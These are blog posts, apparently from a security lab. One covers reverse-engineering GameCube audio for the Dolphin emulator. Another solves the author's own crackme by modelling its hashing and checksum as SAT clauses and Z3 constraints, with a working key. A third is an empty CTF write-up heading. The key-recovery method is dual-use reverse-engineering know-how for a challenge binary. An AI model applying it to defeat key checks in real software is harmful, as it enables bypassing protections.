• # Emulating the Gamecube audio processing in Dolphin

Written by Pierre Bourdon
2012-12-03 20:00:00

For the last two weeks, I've been working on enhancements and bug fixes related to audio processing in the Dolphin Emulator (the only Gamecube/Wii emulator that allows playing commercial games at the moment). Through this project I have learned a lot about how audio processing works in a Gamecube. Very little documentation is available on that subject, so I think writing an article explaining how it works might teach some new things to people interested in Gamecube/Wii homebrew development or emulators development. This article was first published in 3 parts on the Dolphin official forums. Before publishing it on the blog, I made some small changes (mostly proof-reading and adding some complementary images) but most explanations are the same.

If you're interested in the code, it is available in the new-ax-hle branch on the official Google Code repository.

Let's start this exploration of audio emulation in a Gamecube emulator by looking at how the real hardware processes sound data.

## How sound is processed in a Gamecube

There are three main internal components related to sound in a Gamecube: the ARAM, the AI and the DSP:

• ARAM is an auxiliary memory which is used to store sound data. The CPU cannot access ARAM directly, it can only read/write blocks of data from RAM to ARAM (or from ARAM to RAM) using DMA requests. As ARAM is quite large, games often use it to store more than sound data: for example, WWE Day of Reckoning 2 uses it to store animation data (and a bug in DMA handling causes a crash because the data it writes is corrupted).
• The AI (Audio Interface) is responsible for getting sound data from RAM and sending it to your TV. It performs an optional sample rate conversion (32KHz -> 48KHz) and converts the data to an analog signal that is sent through the cables to your audio output device. The input data is read at a regular interval from RAM (not ARAM), usually every 0.25ms 32 bytes of input data is read (each sound sample is 2 bytes, so 32 bytes is 16 sound samples, which is 8 stereo sound samples, and 8 samples every 0.25ms == 32KHz sound).
• The DSP is what processes all the sounds a game wants to play and outputs a single stereo stream. Its job is to perform volume changes on the sounds, sample rate conversion (converting 4KHz sounds which take less space to 32KHz sounds - this is needed because you can't mix together sounds that are not the same rate). It can optionally do a lot of other stuff with the sounds (delaying to simulate 3D sound, filtering, handling surround sound, etc.).

Figure 1: Overview of all the components involved in audio processing in a Gamecube

ARAM and AI are not that hard to emulate: once you understand how they work, they are both simple chips which can only perform one function and don't communicate a lot with the CPU. You just need to have a precise enough timing for AI emulation, and everything is fine.

DSP is a lot harder to emulate properly, for two reasons I have not mentioned yet. First, it is a programmable CPU. All the mixing, filtering, etc. are part of a program that is sent to the DSP by the game, and the DSP behavior varies depending on the program it receives. For example, the DSP is not only used for sound processing, but also to unlock memory cards, and to cipher/decipher data sent to a GBA using the official link cable. Even for sound processing, not every game uses the same DSP code. The second reason is that it can communicate with the main Gamecube CPU, read RAM and ARAM and write to RAM. This allows games to use a complicated communication protocol between CPU and DSP.

We call a program running on the DSP a UCode ("microcode"). Because the DSP is programmable, it would seem like the only way to emulate it properly is to use low level emulation: running instructions one by one from a program to reproduce accurately what the real DSP does. However, while it is programmable, there are actually very few different UCodes used by games. On Gamecube, there are only 3 UCodes we know of: the AX UCode (used in most games because it is distributed with Nintendo's SDK), the Zelda UCode (called that way because it's used in Zelda games, but it is also used for some Mario games and some other first party games), and the JAC UCode (early version of the Zelda UCode, used in the Gamecube IPL/BIOS as well as Luigi's Mansion). That means if we can reproduce the behavior of these three UCodes, we can emulate the audio processing in most games without having to emulate the DSP instructions.

I started working on AX HLE 3 weeks ago because I want to play Skies of Arcadia Legends and Tales of Symphonia, two games that had completely broken audio with the previous AX HLE implementation. I added a new hack to "fix" the bug that caused bad music emulation, but fixing this made me even more interested in rewriting the whole thing to make it cleaner. I wasn't following Dolphin development when the current AX HLE was developed. However, it looks to me as if it was written without actually looking at the DSP code, only looking at what is sent to the DSP and what comes out. I don't know if people at the time had the capability to disassemble DSP code, but it is a very bad way to emulate AX anyway: some parts of the emulation code are completely WTF, and the more you understand how AX works the less you understand how the current AX HLE emulation was able to work and output sound in most cases. That's why, two weeks ago I decided I should start from scratch and re-implement AX HLE.

## AX UCode features and internals

AX is a low-level audio library for Gamecube games, which comes with a builtin UCode to perform audio signal processing on the DSP. I'll first talk about what it can do, then explain how the UCode knows what it should do.

Luckily, Nintendo gives us a lot of information about the role of the DSP in a patent filed on Aug 23 2000: US7369665, "Method and apparatus for mixing sound signals". Figures 8, 9A and 9B are especially interesting in our case because they describe precisely what the DSP does internally and how inputs and outputs interact with each other. That helps, but most of this information could already be discovered by reverse engineering the UCode anyway (I learned the existence of this patent pretty late).

The basic role of the DSP is to get several sounds and mix them together to give a single sound. The sounds that it has to mix are provided through a list of Parameter Blocks (PB). Each PB corresponds to a sound to be mixed. It contains where to find the input sound data, but also a lot of configuration options: input sample rate, sound volume, where it should be mixed and at what volume (left channel/right channel/surround), if the sounds loop, from where does the loop start, etc.

Figure 2: List of PBs with example fields. The PBADDR AX command gives the address of the first PB to the DSP.

Every 5ms AX gets a list of PB and mixes each PB to 3 channels: Left, Right and Surround. It then sends 5ms of output to the RAM, at an address provided by the CPU. Sometimes being able to change sound data only every 5ms is not enough: to overcome that, each PB has a list of updates to be applied every millisecond. This allows sub-5ms granularity in sound mixing configuration. AX also provides a way to add audio effects on the L/R/S streams through the use of AUX channels. Each PB can be mixed to L/R/S but also to AUXA L/R/S and AUXB L/R/S. Then, the CPU can ask to get the contents of the AUXA and AUXB mixing buffers, replace them with its own data, and ask the DSP to mix AUXA and AUXB with the main L/R/S channels.

That's about it for the main features of AX. Some more things can be done optionally (for example Initial Time Delay, used to delay one channel to simulate 3D sound) but they are not used that often by games. Let's see how the CPU sends commands to the DSP.

The DSP has two ways to communicate with the game: through DMA, which allows it to read or write to RAM at any address it wants, and through mailbox registers, which is a more synchronous way to exchange small amounts of data (32 bits at a time) with the CPU. Usually, mailbox registers are used for synchronization and simple commands. For more complicated commands the CPU sends an address to the DSP via mailbox, and the DSP gets the data at this address through DMA.

With AX, about the only thing received through mailboxes (excluding UCode switching stuff which is not relevant to sound processing) is an address to a larger block of data which contains commands for the DSP. Here is a few commands that AX understands and that I have reverse engineered:

• Command 00: SETUP, initializes internal mixing buffers with a constant value or a value and a delta. Usually just initializes to 0.
• Command 02: PBADDR, gives the DSP the address in RAM of the first PB. Each PB contains the address of the next PB, so knowing only the address of the first PB is enough to get the whole list.
• Command 03: PROCESS, does all the audio processing and mixes the PBs to internal buffers.
• Command 04: MIX_AUXA, sends the contents of the AUXA buffers to the CPU, receives processed AUXA, and mix it with the main channels.
• Command 05: MIX_AUXB, same as MIX_AUXA for AUXB
• Command 06: UPLOAD_LRS, sends the contents of the main L/R/S channels to the CPU.
• Command 0D: MORE, read more commands from RAM and start executing them. I suspect this is used for long command lists, but I've never seen it used.
• Command 0E: OUTPUT, interlaces L/R channel, clamp to 16 bits and send to RAM, where it will most likely get picked up by the Audio Interface.
• Command 0F: END, signals the end of a command list.

A few more commands exist, but these commands are the main things to handle to get audio working in most games I've found. Actually, only handling PBADDR, PROCESS, OUTPUT and END should allow about 90% of games to have some of the audio working (without stuff like AUX effects, used for echo/reverb).

When AX is done handling a command list, it sends an interrupt to the CPU to signal that it is ready to receive more data. This is very important because it is the only way for the CPU to know that the data it requested to be uploaded from the DSP is actually valid and done copying/processing. Then, at the next 5ms tick, the CPU will send a new command list to the DSP, and the cycle repeats.

Figure 3: Timeline of an AX 5ms frame handling

## AX HLE in Dolphin, previous vs. new

DSP HLE was developed at a time when people did not know much about how the Gamecube DSP worked. It was basically a hack to have sound in games, and more hacks were added on top of that hack to try and fix bugs. The AX UCode emulation is probably the most hacky thing in the DSP HLE code. For example, some of the code that is used looks like this:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 // TODO: WTF is going on here?!? // Volume control (ramping) static inline u16 ADPCM_Vol(u16 vol, u16 delta) { int x = vol; if (delta && delta < 0x5000) x += delta * 20 * 8; // unsure what the right step is //x += 1 * 20 * 8; else if (delta && delta > 0x5000) //x -= (0x10000 - delta); // this is to small, it's often 1 x -= (0x10000 - delta) * 20 * 16; // if this was 20 * 8 the sounds in Fire Emblem and Paper Mario // did not have time to go to zero before the were closed //x -= 1 * 20 * 16; // make lower limits if (x < 0) x = 0; //if (pb.mixer_control < 1000 && x < pb.mixer_control) x = pb.mixer_control; // does this make // any sense? // make upper limits //if (mixer_control > 1000 && x > mixer_control) x = mixer_control; // maybe mixer_control also // has a volume target? //if (x >= 0x7fff) x = 0x7fff; // this seems a little high //if (x >= 0x4e20) x = 0x4e20; // add a definitive limit at 20 000 if (x >= 0x8000) x = 0x8000; // clamp to 32768; return x; // update volume } 

I don't even know how this code evolved to become what it is displayed here, I just know that it is not a good way to implement AX HLE. Also, some of the design choices in the previous implementation just couldn't allow for accurate HLE.

The first issue is that the audio emulation pipeline was simply not correct: the AI was completely bypassed, and sound went directly from the DSP to the emulated audio mixer, without being copied to RAM at any time. This "kind of" works but completely breaks CPU audio effects... which aren't emulated anyway.

Figure 4: Audio emulation pipeline in the previous AX HLE implementation

But the biggest issue is the timing on which AX HLE was working. On real hardware, the DSP runs on its own clock. At some point the CPU sends commands to it, it processes all of these commands as fast as possible, and sends a message back to the CPU when it's done. The CPU copies the processed data, then when it needs more data (in most cases, 5ms later) it sends new commands to the DSP. In the previous AX HLE implementation, none of that was right. What the emulated AX did was:

• As soon as we get the command that specified the sounds that should be mixed, copy the sound data address somewhere.
• Every 5ms send a message to the CPU saying that we processed the commands (even though no commands were processed)
• When the audio backend (ALSA, XAudio, DirectSound) requires more data, AX HLE mixed the sound and returned audio data.

Basically, nothing was right in the timing. That implementation allows for some cool hacks (like having the audio running at full speed even though the game is not running at 100% speed), but it is inaccurate and bug-prone.

When trying to fix the "missing instruments" bug affecting the games I wanted to play, I noticed all these timing issues and thought about rewriting AX HLE (once again... I always wanted to rewrite AX HLE every time I looked at the code). The hack fix (re4d18e3a8b7c) that I found to compensate for the timing issues really did not satisfy me, and knowing more about AX HLE I noticed that rewriting it was actually not as hard as I thought it would be. After working for 24h streight on new-ax-hle, I finally got a first working version which had ok sounds and music in Tales of Symphonia.

The design in new-ax-hle is in my opinion a lot better than the design used in the previous AX HLE:

• A DSP Thread is created when the UCode is loaded. This thread will be responsible for all the sound mixing work the DSP does.
• When we get commands from the CPU, we copy the command list to a temporary buffer, and wake up the DSP Thread to tell him we have commands to process.
• The DSP Thread handles the commands, sends a message to the CPU when it's done, and goes back to sleep.

It is basically the exact same model DSP LLE on Thread (another DSP configuration option in Dolphin) uses, with less synchronization (LLE tries to match the number of cycles executed on CPU and DSP, which causes some extra performance hit). This also kind of matches what happens on the real hardware, using 2 chips instead of 2 threads. However, this also means the audio processing speed is tied to the CPU speed: if the CPU cannot keep up, it won't send commands often enough and the audio backend won't receive enough data to avoid stuttering.

Figure 5: Comparison of processing timelines. On the left, previous implementation. On the right, new-ax-hle.

Another change, this time not exactly linked to overall design, is that the new-ax-hle now handles most AX commands instead of only the one specifying the first parameter block address like the old AX does. Some of these other commands are used to set up global volume ramping, send data back to the main RAM, mix additional data from the RAM, or output samples to the buffers used by the audio interface. This means new-ax-hle now follows the correct audio emulation pipeline: ARAM -> DSP -> RAM -> AI -> Output (instead of the pipeline used before: ARAM -> DSP -> Output). This also means some CPU sound effects like echo, reverb, etc. should work fine.

Figure 6: Audio emulation pipeline in the new AX HLE implementation

Overall, the more I fix bugs in new-ax-hle, the more I'm amazed the previous AX HLE could work so well. It is a pile of hacks, implementing only 2/19 AX commands (and one of these commands is not even implemented correctly), with a completely wrong timing, and some ugly code that makes no sense. I don't blame the previous authors of this code - at the time, documentation about the DSP was a lot sparser, and analyzing UCodes had to be done with a text editor because there was no awesome IDA plugin for the GC DSP.

## Conclusion

At the time I'm writing this article, new-ax-hle works a lot better than the previous AX HLE in most Gamecube games, and only a few remaining bugs are known in GC games. The Wii AX code is a bit less mature and is more like a proof of concept: I haven't really worked a lot on it, and after one or two weeks of bug fixing it should also become pretty much perfect, including Wiimote audio emulation (which was only supported with LLE previously). I'm hoping this code will be merged for 4.0, and I'll most likely be working on Zelda UCode HLE next (which has a less ugly implementation but has the same design issues as AX).

Thanks to Pierre-Marie (pmderodat@lse) for his nice Inkscape-made pictures.

• # Using SAT and SMT to defeat simple hashing algorithms

Written by Pierre Bourdon
2012-07-31 18:30:00

Note: this article uses MathJax to display formulas written in TeX. Please enable Javascript in order to see the formulas correctly.

One week has passed since the end of LSE Week 2012 and I have received several partial solutions for the crackme that was released at the start of LSE Week for people to play with. Most people who bothered writing partial solutions were able to break the packing and anti debugging parts of it, but stopped at the very end when they faced a simple hashing algorithm they had to reverse to generate a valid key for the crackme. In pseudocode, the algorithm was the following:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 a, b, c, d are the four 32 bits integers given as input (key) Compute a simple checksum in order to avoid having several good solutions to the problem: if ((ROTL((a ^ b) - (c ^ d), 17) ^ (a + b + c + d)) != 0xa6779036) return 0; Kind of useless step just to make things a bit harder a = a XOR c b = b XOR d Then, 128 times in a row, for each integer: Shuffle the bits of the number (using a predefined table) XOR the number with a predefined constant Rotate left the number by N bits (N being another constant) Check if: a == 0x8e2c4c74 b == 0xa6c27e2a c == 0xf5e15d3d d == 0x7bebc2ba 

Clever people might notice that all of the operations done by that "hashing" algorithm are actually non destructive and completely reversible. That means our hashing function is bijective (no collisions) and that it is very easy to get the input from the output: just run it in reverse (rotate left becomes rotate right, XOR stays the same, shuffle uses a slightly modified table). It was meant to keep the crackme easy to crack once the code has been recovered and understood. Unfortunately, some last minute bugs cropped up in the implementation of the algorithm (never try to fix bugs at 4AM without automated tests...) and made the algorithm completely different:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 a, b, c, d are the four 32 bits integers given as input (key) Compute a simple checksum in order to avoid having several good solutions to the problem: if ((ROTL((a ^ b) - (c ^ d), 17) ^ (a + b + c + d)) != 0xa6779036) return 0; a = a XOR c b = b XOR d Then, 128 times in a row, for each integer: Shuffle the bits of the number using a table that might map some bits two times, and some other bits zero times (DESTRUCTIVE) XOR the number with a predefined constant Rotate left the number by N bits (N being another constant), except if this is the last number - in this case, rotate the third integer and use it as the new value for the last integer Check if: a == 0x8e2c4c74 b == 0xa6c27e2a c == 0xf5e15d3d d == 0x7bebc2ba 

The first error (in the shuffling part) comes from an indexing error in my bits position table. The table was defined like this:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 // Maps the input bit position to the output bit position static const char mapping[128] = { // First integer 2, 14, 4, 24, 7, 31, 16, 18, 30, 17, 12, 27, 6, 26, 9, 22, 1, 28, 5, 3, 11, 23, 13, 25, 19, 20, 10, 29, 8, 15, 21, 0, // Second integer 26, 20, 15, 27, 28, 14, 21, 7, 17, 22, 31, 12, 4, 13, 8, 10, 23, 19, 18, 25, 9, 2, 5, 11, 6, 3, 24, 1, 0, 30, 29, 16, // Third integer 4, 26, 20, 13, 21, 29, 3, 14, 5, 22, 18, 6, 28, 23, 16, 10, 15, 27, 25, 1, 17, 0, 30, 2, 8, 24, 7, 9, 31, 19, 12, 11, // Fourth integer 8, 22, 26, 1, 20, 2, 30, 23, 6, 9, 0, 14, 18, 31, 3, 21, 4, 29, 24, 7, 12, 28, 16, 25, 11, 17, 19, 27, 5, 10, 15, 13 }; 

But the indexing was done like this:

 1 2 3 // *pn points to the current integer, i is the index of this integer (0, 1, // 2 or 3), j is the current bit. newn |= ((*pn >> scramble[(i << 2) + j]) & 1) << j; 

That i << 2 should actually be a i << 5 in order to use the whole mapping table. This bug makes the algorithm destructive because some bits from the input will not be used to generate the output. That means you can't get the input of the step from its output: the destroyed bits could have been 0 or 1.

The second bug is actually a stupid typo:

 1 2 3 4 a = ROTL(a, 7); b = ROTL(b, 13); c = ROTL(c, 17); d = ROTL(c, 25); 

I don't think this requires much explanation.

Now that the context of this article has been explained, the real question for me was the following: do these errors make the crackme unsolvable or can it still be solved easily using either bruteforce or more complex analysis techniques?

## SAT and its applications to cryptography

I started writing a bruteforcer for this hash using backtracking for each destroyed bit and only exploring the branches that would be valid later on by predicting as much as possible. Unfortunately, while that worked for a small number of iterations of the hash, the original algorithm used 128 iterations and the number of possible combinations increased a lot too fast to use such a simple technique.

Two days later I got reminded by a friend of a talk presented by Mate Soos at Hackito Ergo Sum 2011 about SAT solvers and their application to cryptography for breaking weak ciphers and hashes. Mate is the author of CryptoMiniSat, a very fast implementation of SAT with a few tweaks that can be used to increase efficiency for crypto usages.

Before going into the details of how to use SAT to break ciphers, let's talk a little bit about SAT solvers. SAT solvers are programs designed to solve the Boolean Satisfiability Problem, which can be expressed very simply like this: For this boolean formula, can I find values for the variables that make the formula true. This is an NP-complete problem (which means you can't solve the general case of that problem in polynomial time, only exponential time or slower) and is actually kind of the canonical NP-complete problem: it is a very common technique to reduce a problem to show that it is equivalent to SAT in order to prove that it is an NP complete problem.

Most SAT solvers take their input in a format called DIMACS, which is an easy-to-parse representation of boolean formulas in CNF (Conjunctive Normal Form). A CNF formula is a special case of boolean formula which is always written like this:

$$(X_i \vee \neg X_j) \wedge (\neg X_k \vee X_l \vee \neg X_m \vee X_n) \wedge \ldots$$

Basically, CNF is a logical product (aka. conjunction) of sums of variables or negated variables ($$\neg A$$). Every boolean formula can be converted into an equivalent CNF formula, either manually (distribute the $$\vee$$ over products) or through an automated process (there are some conversion tables between simple boolean equations and their CNF equivalent).

SAT solvers have a lot of applications and tend to be very optimized in order to have extremely good performances in most cases. It is common to try to solve SAT problems with several hundreds of thousands of clauses (a clause is a single sum of variable, like $$A \vee B \vee \neg C \vee D$$) and tens of thousands of variables.

In his talk last year, Mate Soos told us about how HiTag2 (a cryptosystem used in car locks) was reverse engineered, then translated to mathematical formulas and finally converted to CNF formulas describing the relations between input bits and output bits. If you are interested by that talk, it is available on Youtube. I thought that this technique might be of some use in breaking my hash algorithm and started translating the hash algorithm to an equivalent CNF representation.

## Breaking the hash with SAT

First of all, the definition of the algorithm would most likely use several thousands of clauses and about as much variables, so writing it by hand is out of the question. I started by writing a very simple library to generate DIMACS files, which exposes the following Python API:

• CNFGenerator.new_var() generates a new SAT variable instance, which has only one operation: logical negation (written -x)
• CNFGenerator.add(v1, v2, ..., vN) adds a clause to the output DIMACS file
• CNFGenerator.output() outputs the DIMACS representation

CryptoMiniSAT also provides a very useful extension to DIMACS for cryptographical uses: the ability to use XOR clauses which are $$A \oplus B \oplus C \oplus \ldots$$. These prove very useful in order to write equivalences ($$A \Leftrightarrow B \equiv \neg (A \oplus B) \equiv \neg A \oplus B$$) or simply XOR relations. CNFGenerator.add_xor handles the generation of such clauses.

Let's start by defining our input variables. They are four vectors of 32 bits, so 128 boolean variables:

 1 2 3 4 5 6 7 8 def cnf_int(gen, bits): return [gen.new_var() for i in range(bits)] # Input variables a = cnf_int(gen, 32) b = cnf_int(gen, 32) c = cnf_int(gen, 32) d = cnf_int(gen, 32) 

If you follow the pseudocode above, the next step would normally be the checksum. This is actually the hardest part of this algorithm to formalize because of the arithmetic operations (additions and substractions of 32 bits numbers). We'll do that last. The following step is a ^= c; b ^= d. This is quite easy to formalize. Let's do it for the general case , i.e. a = b ^ c. What this does is "make each bit of a equal to the same bit of b XOR the same bit of c". To formalize it, we can introduce a new variable $$A$$ which is equivalent to $$B \oplus C$$, which means the clause can only be true iff $$A$$ has the same value as $$B \oplus C$$. We just need to write that in a form that CryptoMiniSat can understand:

\begin{aligned} A \Leftrightarrow (B \oplus C) & \equiv \neg (A \oplus (B \oplus C)) \\\\ & \equiv \neg (A \oplus B \oplus C) \\\\ & \equiv \neg A \oplus B \oplus C \end{aligned}

Applied to the 32 bits of the variables and converted to Python, this gives us the following code:

 1 2 3 4 5 6 7 8 9 def cnf_xor(gen, a, b): out = [gen.new_var() for i in range(len(a))] for (a, b, o) in zip(a, b, out): gen.add_xor(-a, b, o) return out # a ^= c, b ^= d a = cnf_xor(gen, a, c) b = cnf_xor(gen, b, d) 

Next comes the core of the hashing algorithm: the iterated loop shuffling the bits, XOR-ing with a constant and rotating the number. The interesting part here is that shuffling and rotating bits does not require any clause or additional variables for the SAT representation of the algorithm: For example, if you have a 4 bit integer represented as the vector $$A_3 A_2 A_1 A_0$$, rotating it to the left by 2 bits transforms it to the vector $$A_1 A_0 A_3 A_2$$. You just need to swap the elements in the list representing your variables. This gives us the following Python code:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 def cnf_rotl(gen, n, b): """Performs a left rotation of n by b bits""" return n[-b:] + n[:-b] def cnf_hash(gen, a, b, c, d): """Hashes a, b, c, d, returns new a, new b, new c, new d""" out = [] for i, n in enumerate((a, b, c, d)): scrambled = [n[SCRAMBLE_TABLE[i][j]] for j in range(len(n))] xored = cnf_xor_const(gen, scrambled, XOR_TABLE[i]) out.append(xored) out[0] = cnf_rotl(gen, out[0], ROT_TABLE[0]) out[1] = cnf_rotl(gen, out[1], ROT_TABLE[1]) out[2] = cnf_rotl(gen, out[2], ROT_TABLE[2]) out[3] = cnf_rotl(gen, out[2], ROT_TABLE[3]) return out # Iterate the hash 128 times for a, b, c and d for i in range(128): a, b, c, d = cnf_hash(gen, a, b, c, d) 

cnf_xor_const works the same as cnf_xor but "optimized" in order to XOR with a constant number instead of a variable number.

Now that we computed the hashed values, we just need to put some clauses to make sure they are equal to the hash we are looking for. In the crackme, the hash value was 8e2c4c74a6c27e2af5e15d3d7bebc2ba. To make sure one of our boolean vectors is equal to a constant value, we add one clause per bit of the vector which forces it to True if the corresponding bit in the constant value is 1, and False if the bit is 0:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 def cnf_equal(gen, n, c): for i in range(len(n)): b = c & 1 c >>= 1 if b: gen.add(n[i]) else: gen.add(-n[i]) # Check for equality cnf_equal(gen, a, 0x8e2c4c74) cnf_equal(gen, b, 0xa6c27e2a) cnf_equal(gen, c, 0xf5e15d3d) cnf_equal(gen, d, 0x7bebc2ba) 

With only this code, the SAT solver will generate us values for a, b, c and d that compute to the hash we are looking for. However, we still have to defeat the checksum. Let's look at its code again:

 1 2 if ((ROTL((a ^ b) - (c ^ d), 17) ^ (a + b + c + d)) != 0xa6779036) return 0; 

We already now how to compute XORs, rotations and how to check for number equality, so the remaining part is additions and substractions on 32 bit numbers. As you may already know, substraction is actually very easy to implement in terms of addition and two's complement, which is itself very easy to implement in terms of binary inversion and addition:

$$x - y \equiv x + COMPL2(y) \equiv x + INVERT(y) + 1$$
  1 2 3 4 5 6 7 8 9 10 11 def cnf_invert(gen, n): inv = [gen.new_var() for b in n] for (b, i) in zip(n, inv): gen.add(b, i) gen.add(-b, -i) return inv def cnf_sub(gen, a, b): invb = cnf_invert(gen, b) complb = cnf_add(gen, invb, cnf_const32(gen, 1)) return cnf_add(gen, a, complb) 

Addition on 32 bit integers is however a lot harder to define. If you did a bit of electrical engineering or if you have implemented an ALU (in HDL, with wires and logic gates, or even in Minecraft) you may know a very common way to define addition using two half adders to make a 1 bit full adder. Here is what a full adder looks like (image courtesy of Wikipedia):

It takes two bits, A and B, as well as a carry from a previous adder (Cin), and outputs the sum A + B + Cin and the carry resulting from that sum Cout. You can then chain these 1 bit full adders to make a 32 bit adder (again, image from Wikipedia):

Writing the truth table of a 1 bit full adder and simplifying the equations a bit, you get the following equations for S and Cout from A, B and Cin:

\begin{aligned} S & \equiv \overline{A} B \overline{C_{in}} \vee A \overline{B C_{in}} \vee A \overline{B} C_{in} \vee A B C_{in} \\\\ C_{out} & \equiv A B \vee A C_{in} \vee B C_{in} \end{aligned}

You can then translate these formulas to CNF to describe a 1 bit full adder for the SAT solver. However doing that manually is a lot of work (especially if you're like me and never had proper formation on CNF and how to convert formulas to that form), so we're just going to use the boolean algebra package from Sage to do it automatically:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 sage: import sage.logic.propcalc as propcalc sage: f = propcalc.formula("d <-> (~a&b&~c | a&~b&~c | ~a&~b&c | a&b&c)") sage: f.convert_cnf_table() sage: f (d|a|b|~c)&(d|a|~b|c)&(d|~a|b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|~b|~c)&(~d|~a|b|~c)&(~d|~a|~b|c) sage: f = propcalc.formula("d <-> (a&b | a&c | b&c)") sage: f.convert_cnf_table() sage: f (d|a|~b|~c)&(d|~a|b|~c)&(d|~a|~b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|b|~c)&(~d|a|~b|c)&(~d|~a|b|c) sage: import sage.logic.propcalc as propcalc sage: f = propcalc.formula("d <-> (~a&b&~c | a&~b&~c | ~a&~b&c | a&b&c)") sage: f.convert_cnf_table() sage: f (d|a|b|~c)&(d|a|~b|c)&(d|~a|b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|~b|~c)&(~d|~a|b|~c)&(~d|~a|~b|c) sage: f = propcalc.formula("d <-> (a&b | a&c | b&c)") sage: f.convert_cnf_table() sage: f (d|a|~b|~c)&(d|~a|b|~c)&(d|~a|~b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|b|~c)&(~d|a|~b|c)&(~d|~a|b|c) 

We can then convert the CNF clauses Sage gives us directly to Python:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 def cnf_1bitadder(gen, a, b, c): res = gen.new_var() res_carry = gen.new_var() # (d|a|~b|~c)&(d|~a|b|~c)&(d|~a|~b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|b|~c)&(~d|a|~b|c)&(~d|~a|b|c) gen.add(res_carry, a, -b, -c) gen.add(res_carry, -a, b, -c) gen.add(res_carry, -a, -b, c) gen.add(res_carry, -a, -b, -c) gen.add(-res_carry, a, b, c) gen.add(-res_carry, a, b, -c) gen.add(-res_carry, a, -b, c) gen.add(-res_carry, -a, b, c) # (d|a|b|~c)&(d|a|~b|c)&(d|~a|b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|~b|~c)&(~d|~a|b|~c)&(~d|~a|~b|c) gen.add(res, a, b, -c) gen.add(res, a, -b, c) gen.add(res, -a, b, c) gen.add(res, -a, -b, -c) gen.add(-res, a, b, c) gen.add(-res, a, -b, -c) gen.add(-res, -a, b, -c) gen.add(-res, -a, -b, c) return res, res_carry 

Probably not the nicest way to do it, but most likely one of the simplest way. We can then use that one bit adder to make a 32 bit adder:

  1 2 3 4 5 6 7 8 9 10 def cnf_add(gen, a, b): carry = gen.new_var() gen.add(-carry) # The first carry is always 0 out = [] for (a, b) in zip(a, b): res, carry = cnf_1bitadder(gen, a, b, carry) out.append(res) return out 

With this we can finally implement our checksum!

 1 2 3 4 sum = cnf_add(gen, a, cnf_add(gen, b, cnf_add(gen, c, d))) sub = cnf_sub(gen, cnf_xor(gen, a, b), cnf_xor(gen, c, d)) cksum = cnf_xor(gen, cnf_rotl(gen, sub, 17), sum) cnf_equal(gen, cksum, 0xa6779036) 

Running our Python program generates a DIMACS file with 17061 variables and 19365 clauses. CryptoMiniSat can find a set of values that satisfy the clauses in less than 0.05s on my Sandy Bridge based laptop. For example, a = 0xe9e708e1, b = 0xf7e4c55a, c = 0x85e77db9 and d = 0x5467bd3c pass both the checksum and the hash and are considered a valid solution.

## Using Z3 to make things easier

At first I planned to stop there: I had a proof that the crackme was still doable even with that broken hash algorithm. However when I explained what I was doing, a friend of mine told me about SMT solvers. One of their characteristics is that they can work on boolean algebra, but also functions and linear combinations of integer and real variables. For example, you can use an SMT solver for this kind of problem:

$$x^2 + y^2 < 1, 2x + y > 1$$

I looked a bit at recent SMT solvers to see if it could make cracking my hash easier. I used the Z3 theorem prover from Microsoft Research, which is not open source but has Linux binaries and nice interfaces for programming languages like Python and OCaml. Z3 can work on real numbers, integers, functions but also bit vectors, and has a nice API to do so.

As expected, things are a lot easier when your solver has native support for your native problem representation (here, bit vectors and unsigned integers). The code cracking the hash using Z3 is a fair bit slower (still less than 5s) but also much shorter and easier to understand:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 def rotl32(n, sa): return (n << sa) | LShR(n, 32 - sa) def hash(a, b, c, d): out = [] for i, n in enumerate((a, b, c, d)): nn = BitVecVal(0, 32) for j in range(32): nn |= (LShR(n, SCRAMBLE_TABLE[i][j]) & 1) << j nn ^= XOR_TABLE[i] out.append(nn) out[0] = rotl32(out[0], ROT_TABLE[0]) out[1] = rotl32(out[1], ROT_TABLE[1]) out[2] = rotl32(out[2], ROT_TABLE[2]) out[3] = rotl32(out[2], ROT_TABLE[3]) return out if __name__ == '__main__': s = Solver() a = BitVec('a', 32) b = BitVec('b', 32) c = BitVec('c', 32) d = BitVec('d', 32) checksum = rotl32((a ^ b) - (c ^ d), 17) ^ (a + b + c + d) a ^= c b ^= d for i in range(128): a, b, c, d = hash(a, b, c, d) solve(checksum == 0xa6779036, a == 0x8e2c4c74, b == 0xa6c27e2a, c == 0xf5e15d3d, d == 0x7bebc2ba) 

Here the shorter code is mostly due to the fact I did not have any nice API to use CryptoMiniSat and to translate arithmetic operations to CNF. SMT solvers do not provide that much of an edge over SAT solvers for these kind of problems: they shine a lot more as soon as you introduce functions or real numbers that can't easily be expressed as a bit vector.

## Conclusion

Sometimes when simple bruteforce does not work you have to go a bit further to reverse a hash algorithm, and using a SAT solver enables you to do just that. The problem is not always easy to formalize, especially when you start using complex operations that can't easily be translated, but using SAT solvers for cryptography is a very interesting technique that has already proven itself a lot of times in the past, and will probably become more and more useful in the future as SAT solvers and ways to formalize hard problems (like AES) evolve.

• # NDH2K12 Prequals: shortner writeup

Written by Pierre Bourdon
2012-03-25 00:42:00

